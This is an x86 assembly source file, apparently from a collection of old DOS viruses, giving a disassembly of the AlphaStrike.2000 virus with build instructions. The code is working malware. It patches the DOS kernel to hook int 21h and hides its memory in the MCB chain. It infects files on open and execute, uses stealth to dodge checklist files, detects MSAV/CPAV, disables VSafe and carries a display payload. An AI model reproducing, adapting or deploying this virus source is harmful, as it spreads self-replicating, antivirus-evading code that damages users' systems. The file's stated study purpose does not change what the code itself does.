alpha.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

; AlphaStrike.2000 or whatever its called by Neurobasher. disasm by retch.
; there are no comments. there are no need for comments unless you are lame.
;
; GREETZ R LAYME SO I WEEL NOT DO NE.
;
; 2 COMPYLE:
;       tasm /m alpha.asm   (EYE UZED FORE DOT SOMETHING)
;       tlink alpha.obj     (umm... 2.xx)
;       exe2bin alpha.exe alpha.com
;
; i am contactable via retro@pcscav.com

.model  tiny
.code
.286

virus_start:    mov     di, 0F242h
                mov     si, word ptr ds:[2h]
		sub	si, di
		cmp	si, 1000h
		call	getip
getip:          mov     bp, sp
                mov     bp, [bp]
		cld	
		mov	ax, 4458h
		int	21h
		jb	checkifdosinhma
		mov	ds, es:[bx+0Eh]
		mov	si, 0Bh
		jmp	addressatSI
sysentry:       pushf   
		pusha	
		push	ds
		push	es
		jmp	virus_start
checkifdosinhma:mov     ax, 3306h
		int	21h
		cmp	al, 6
		jnz	checkdosversion
		cmp	dh, 10h
		jnz	go_abortinstall
		mov	ax, 0FFC4h
		jmp	compareints
checkdosversion:mov     ah, 30h
		int	21h
		xchg	al, ah
		cmp	ax, 31Eh
		mov	ax, 1Bh
		jb	go_abortinstall
compareints:    mov     cx, 0Ah
		mov	ds, cx
		mov	es, cx
		mov	si, 14h
		mov	bx, si
		lea	di, [bx+si]
		cmpsw
		jnz	abortinstall
		cmpsw
go_abortinstall:jnz     abortinstall
		lds	si, [bx]
		add	si, ax
		cmp	al, 1Bh
		jz	checkifkernelpatched
		mov	si, [si+8]
addressatSI:    lds     si, [si]
checkifkernelpatched:
                cmp     byte ptr [si], 0EAh
		jz	abortinstall
                mov     cs:[bp+(kernaladdress  )-getip], si
                mov     cs:[bp+(kernaladdress+2)-getip], ds
		call	getmemory
		jnz	abortinstall
                lea     si, [bp+(virus_start)-getip]
		push	cs
		pop	ds
		mov	es, cx
		mov	cx, offset header
		rep movsb
		sub	ax, ax
                mov     cl, 0C0h
		rep stosb
                mov     di, offset newint21
                mov     es:[di+1], al
                lds     si, ds:[bp+(kernaladdress)-getip]
		mov	ax, [si]
                mov     cl, 6Ch
		mov	bx, 6
                cmp     al, 0FAh
		jz	patchkernel
		mov	bl, 7
                cmp     al, 2Eh
		jz	patchkernel
                mov     cl, 69h
		mov	bl, 5
                cmp     al, 80h
		jnz	abortinstall
patchkernel:    mov     es:[di+savecmp-newint21], cl
		add	bx, si
                mov     es:[di+kernaladdress-newint21], bx
                mov     byte ptr [si], 0EAh
		mov	[si+1],	di
		mov	[si+3],	es
abortinstall:   pop     ax
		sub	si, si
		mov	ax, ss
                cmp     ah, 90h
		jz	restoresys
                mov     ah, 62h
		int	21h
		push	bx
		mov	ds, bx
		mov	cx, [si+2Ch]
		jcxz	restorehost
		mov	ds, cx
		mov	ch, 8
findcomspec:    cmp     word ptr [si], 4F43h
		jnz	keeplooking
		cmp	word ptr [si+6], 3D43h
		jz	foundcomspec
keeplooking:    inc     si
		loop	findcomspec
		jmp	restorehost
foundcomspec:   mov     ax, 3D00h
		lea	dx, [si+8]
		int	21h
		xchg	ax, bx
                mov     ah, 3Eh
		int	21h
restorehost:    pop     ax
		mov	ds, ax
		mov	es, ax
		add	ax, 10h
		mov	bx, ax
                db      81h,0C3h
savess          dw      0FFF0h
		cli	
                db      0BCh
savesp          dw      0FFFEh
		mov	ss, bx
                db      5
savecs          dw      0FFF0h
                mov     cs:[bp+jumpsegment-getip], ax
		cmp	sp, 0FFFEh
		jnz	zeroregs
                mov     word ptr ds:100h, 20CDh
first2          =       $-2
                mov     byte ptr ds:102h, 90h
next1           =       $-1
zeroregs:       sub     ax, ax
		sub	bx, bx
		sub	cx, cx
		cwd	
		sub	si, si
		sub	di, di
		sub	bp, bp
		sti	
		jmp	near ptr jumptohost
                db      0EAh
jumptohost      db      0EAh
saveip          dw      100h
jumpsegment     dw      0
restoresys:     pop     es
		pop	ds
		mov	word ptr [si+8], 0
sysret2         =       $-2
		popa
		popf	
                db      68h
sysret          dw      0
		ret	
getmemory:      call    getlastmcb
		mov	ax, ds
		mov	bx, [si+3]
		sub	bx, dx
		add	ax, bx
		xchg	ax, cx
		xchg	ax, bx
		jmp	setnewmcbsize
setlastmcbsize: call    getlastmcb
		dec	ax		; ax=cs
		mov	cx, ax		; cx=ax
sublastmcbseg:  sub     ax, bx          ; ax=ax-lastmcbseg
setnewmcbsize:  dec     ax
		or	di, di
		jnz	dontsetmcbsize
		mov	[si+3],	ax
dontsetmcbsize: ret     
modifytomseginpsp:
                mov     ah, 62h
		int	21h
		mov	ds, bx
		int	12h
		shl	ax, 6
                sub     ax, 87h
		mov	ds:2, ax
hideourmem:     call    getlastmcb
		add	ax, dx		; ax=virusparasize+virusseg+1
		jmp	sublastmcbseg
getlastmcb:     push    es
                mov     ah, 52h
		int	21h
		mov	ds, es:[bx-2]
		mov	ax, 5802h
		int	21h
		cbw	
		push	ax
		mov	ax, 5803h
		mov	bx, 1
                int     21h             ; set umb's as part of chain
		sub	si, si
		mov	di, si
getlastmcbloop: call    getnextmcb
		jnz	getlastmcbloop
		pop	bx
		push	ax
		mov	ax, 5803h
		int	21h
		pop	bx
		pop	es
		mov	ax, cs
		inc	ax
                mov     dx, 87h         ; 2160d / 10h
		ret	
getnextmcb:     cmp     word ptr [si+10h], 20CDh
		jnz	checkiflast
                cmp     byte ptr [si+15h], 0EAh
		jnz	checkiflast
		inc	di
checkiflast:    cmp     byte ptr [si], 5Ah      ; 'Z'
		jz	islastblock
		mov	ax, ds
		inc	ax
		add	ax, [si+3]
		mov	ds, ax
islastblock:    ret 
newint21:       db 0EBh
virusactive	db 4Ch
		mov	cs:saveds, ds
		push	cs
		pop	ds
		mov	savedi,	di
                mov     di, offset saveds
                mov     byte ptr [di+virusactive-saveds], 4Ch
                mov     [di+savees-saveds], es
                mov     [di+saveax-saveds], ax
                mov     [di+savebx-saveds], bx
                mov     [di+savecx-saveds], cx
                mov     [di+savedx-saveds], dx
                mov     [di+savesi-saveds], si
                mov     [di+savebp-saveds], bp
		push	cs
		pop	es
		mov	di, offset functions
		db 0B9h
stealthmode	dw 14h
		xchg	al, ah
		xor	al, 5Fh
		cld	
		repne scasb
		jnz	exithandler
                sub     di, offset functions+1
		shl	di, 1
		add	di, offset functionoffsets
		push	offset exithandler
		push	word ptr [di]
		jmp	near ptr restoreregs
exithandler:    call    restoreregsandsetvirusactive
emulateoldkernal:
                cmp     ah, 6Ch
savecmp         =       $-1
		ja	zeroal_iret
		cli	
		db 0EAh
kernaladdress	dd 0FDC840FEh
writeheader:    mov     ah, 40h
		mov	cx, 18h
readwritefromsi:mov     dx, si
int21:          cli     
		pushf	
		call	cs:kernaladdress
		ret	
zeroal_iret:    mov     al, 0
		iret	
restoreregsandsetvirusactive:
		call	near ptr restoreregs
setvirusactive: mov     cs:virusactive, 0
		ret	
memstealth:     call    setlastmcbsize  ; 48h/49h/4Ah
restoreregs:    db      0B8h
saveds          dw      9850h
		mov	ds, ax
                db      0B8h
savees          dw      6D8h
		mov	es, ax
                db      0B8h
saveax          dw      4B00h
                db      0BBh
savebx          dw      241h
                db      0B9h 
savecx          dw      209h
                db      0BAh
savedx          dw      40E6h
                db      0BEh
savesi          dw      0E4h 
                db      0BFh
savedi          dw      0
                db      0BDh
savebp          dw      6914h
		ret	
loc_0_272:      mov     dx, 3F5h
		mov	al, 4
		mov	ch, 4
		out	dx, al
                loop    $
		mov	ch, 4
		out	dx, al
                loop    $
		in	al, dx
		test	al, 40h
		ret	
message         db      002h,0E0h,052h,0BFh,0B4h,0B0h,0B8h,0BFh,0E0h,0ADh 
                db      0ACh,0AEh,0B7h,0B5h,0BBh,051h,0E0h,007h,0E0h,0BFh 
                db      09Ch,08Ah,09Fh,092h,09Dh,09Bh,09Ch,0E0h,0ACh,09Fh 
                db      09Dh,08Ch,097h,09Dh,09Fh,094h,0E0h,0AAh,097h,08Eh 
                db      09Fh,094h,0E0h,0B7h,093h,090h,094h,09Fh,092h,08Ch
                db      0E0h,09Eh,087h,0E0h,0B2h,0BBh,0ABh,0AEh,0B1h,0BEh 
                db      0BFh,0ADh,0B8h,0BBh,0AEh,0D9h,0C7h,0CDh,0E0h,0D1h 
                db      0E0h,0B9h,09Bh,08Eh,093h,09Fh,092h,087h,0E0h,002h 
setnofilestealth:
		mov	byte ptr cs:stealthmode, 12h
activate:       ret 
		call	clearscreen
		mov	ah, 2
		mov	bh, 0
		mov	dx, 0C00h
		int	10h
		mov	si, offset message
                mov     cx, 4Eh
displayloop:    lods    byte ptr cs:[si]
		neg	al
		int	29h
		loop	displayloop
		xor	ax, ax
		int	16h
clearscreen:    mov     ax, 3
		int	10h
setnoactivate:  mov     byte ptr cs:activate, 0C3h
		ret	
execute:        call    setfullstealth
		call	setnoactivate
		cmp	al, 1
                mov     al, 90h
		call	setdirstealth
		jnz	infectdx
		mov	ax, 3D02h
		int	21h
		jb	ret3
		xchg	ax, bx
		call	disinfecthandle
                mov     ah, 3Eh
		int	21h
                mov     byte ptr ds:activate, 90h
ret3:  		ret	
infectsi:       mov     dx, si
infectdx:       cmp     ax, 4300h
		jz	ret3
		call	sethandletozero
                cmp     ah, 3Dh
		jnz	dontsetfullstealth
		call	setfullstealth
dontsetfullstealth:
		mov	si, dx
		mov	di, offset buffer
		push	cs
		pop	es
copyname:       lodsb
		or	al, al
		jz	namecopied
		stosb
		jmp	copyname
namecopied:     stosb
		mov	cl, byte ptr cs:saveax+1
		mov	ax, [si-7]
		mov	bx, [si-0Bh]
                cmp     cl, 3Dh
		jnz	notopen
		db 0EBh
dontopenchklist	db 16h
		cmp	ax, 5453h	; chkliST?
		jnz	notopen
		cmp	bx, 4B48h	; cHKlist?
		jnz	notopen
		pop	ax
		call	restoreregsandsetvirusactive
		mov	ax, 2
		stc	
		retf	2
notopen:        cmp     cl, 4Bh
		jnz	checkifavactive
		mov	cl, 16h
		cmp	ax, 5641h
		jnz	notmsavorcpav
		mov	cl, 0
notmsavorcpav:  mov     cs:dontopenchklist, cl
		cmp	bx, 5343h
		jz	setmemstealthonly
		cmp	bx, 4142h
		jz	setmemstealthonly
		cmp	ax, 4148h
		jz	setmemstealthonly
		cmp	ax, 4A52h
		jz	setmemstealthonly
		cmp	word ptr [si-8], 495Ah
		jnz	leavestealthmode
setmemstealthonly:
		mov	byte ptr cs:stealthmode, 8
leavestealthmode:
		push	ax
		mov	ax, 160Ah
		int	2Fh
		cmp	al, 0Ah
		pop	ax
		jnz	checkifavactive
		cmp	ax, 5641h
		jz	checkifavactive
		cmp	bx, 544Eh
		jz	checkifavactive
		call	hideourmem
checkifavactive:
		mov	bx, 0FF0Fh
		xchg	ax, bx
		int	21h
		cmp	al, 1
		jz	ret4
		mov	bl, 0
		call	vsafe
		push	cs
		pop	ds
                mov     ah, 2Fh
		int	21h
		push	es
		push	bx
		mov	ah, 1Ah
		mov	dx, offset tempdta
		int	21h
		mov	ax, 3524h